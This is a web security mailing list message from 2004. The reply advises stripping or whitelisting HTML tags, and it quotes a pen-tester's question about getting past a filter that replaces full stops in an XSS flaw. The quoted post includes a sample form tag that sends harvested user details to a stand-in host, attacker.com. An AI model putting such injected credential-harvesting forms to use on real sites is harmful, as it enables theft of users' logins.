WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "V. Poddubniy" <vpoddubniy () mail ru>
Date: Tue, 1 Jun 2004 00:37:22 +0400
Hello, Why not to prohibit HTML tags at all? Or just accept only some tags (b, i, u) without params? It will stop all your problems... (I know, you NEED tags, but usually, when people say so, it means, that they just do not want to do it, but they often can...) -- Best regards, Vladimir Poddubniy -----Original Message----- From: Calum Power [mailto:enune () fribble net] Sent: Saturday, May 29, 2004 8:49 AM To: webappsec () securityfocus com Subject: Fullstop Substitution in XSS Hi all, As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_). Now, I'm trying trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any: <form target="http://attacker.com/path/to/script"> is of course being filtered into: <form target="http://attacker_com/path/to/script"> Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously). Any help would be appreciated. Cheers, Calum -- Calum Power Cultural Jammer Security Enthusiast Hopeless Cynic enune () fribble net http://www.fribble.net
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)